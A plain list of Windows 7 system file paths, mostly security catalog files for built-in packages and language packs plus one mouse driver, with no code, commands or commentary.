- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-LanguagePack-Package-wrapper~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-LanguagePack-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-LanguagePack-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Refresh-LanguagePack-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Wired-Network-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Wired-Network-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Wired-Network-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Wired-Network-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ClipsInTheLibrary-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ClipsInTheLibrary-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ClipsInTheLibrary-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ClipsInTheLibrary-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-CodecPack-Basic-Encoder-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-CodecPack-Basic-Encoder-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-CodecPack-Basic-Package-wrapper~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-CodecPack-Basic-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-CodecPack-Basic-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-CodecPack-Basic-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-CodecPack-Basic-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Common-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Common-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Common-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Common-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Common-Modem-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Common-Modem-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Common-Modem-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Common-Modem-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-DesktopWindowManager-uDWM-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-DesktopWindowManager-uDWM-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Disk-Diagnosis-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Disk-Diagnosis-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Disk-Diagnosis-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Disk-Diagnosis-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Display-ChangeDesktopBackground-Disabled-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Display-ChangeDesktopBackground-Disabled-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Editions-Client-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Editions-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-EnterpriseEdition-wrapper~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-EnterpriseEdition~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-EnterpriseEdition~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Foundation-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Foundation-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Gadget-Platform-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Gadget-Platform-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Gadget-Platform-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Gadget-Platform-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GPUPipeline-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GPUPipeline-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GPUPipeline-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GPUPipeline-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientExtensions-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientExtensions-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientExtensions-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientExtensions-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAHB-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAHB-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAHB-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAHB-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAHP-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAHP-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAHP-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAHP-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAPE-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAPE-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAPE-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAPE-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAPS-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAPS-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAPS-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAPS-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUASE-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUASE-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUASE-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUASE-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAUE-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAUE-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAUE-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAUE-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-Customization-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-Customization-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-Customization-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-Customization-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-HomeBasicEdition-wrapper~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-HomeBasicEdition~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-HomeBasicEdition~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-HomePremiumEdition-wrapper~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-HomePremiumEdition~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-HomePremiumEdition~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ICM-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ICM-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ICM-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ICM-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IE-Troubleshooters-Package-wrapper~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IE-Troubleshooters-Package-wrapper~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IE-Troubleshooters-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IE-Troubleshooters-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IE-Troubleshooters-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IE-Troubleshooters-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-AddOn-2-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-AddOn-2-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-AddOn-2-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-AddOn-2-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-AddOn-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-AddOn-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-AddOn-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-AddOn-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Indexing-Service-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Indexing-Service-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Indexing-Service-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Indexing-Service-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-InternetExplorer-Optional-Package-wrapper~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-InternetExplorer-Optional-Package-wrapper~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~en-US~8.0.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~en-US~8.0.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-InternetExplorer-Package~31bf3856ad364e35~amd64~en-US~8.0.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-InternetExplorer-Package~31bf3856ad364e35~amd64~en-US~8.0.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-InternetExplorer-Package~31bf3856ad364e35~amd64~~8.0.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-InternetExplorer-Package~31bf3856ad364e35~amd64~~8.0.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Killbits-Package~31bf3856ad364e35~amd64~~8.0.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Killbits-Package~31bf3856ad364e35~amd64~~8.0.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Links-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Links-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Links-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Links-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-LocalPack-AU-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-LocalPack-CA-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-LocalPack-GB-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-LocalPack-US-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-LocalPack-ZA-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Media-Format-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Media-Format-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Media-Format-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <DRIVERS>\sermouse.sys
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Media-Format-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
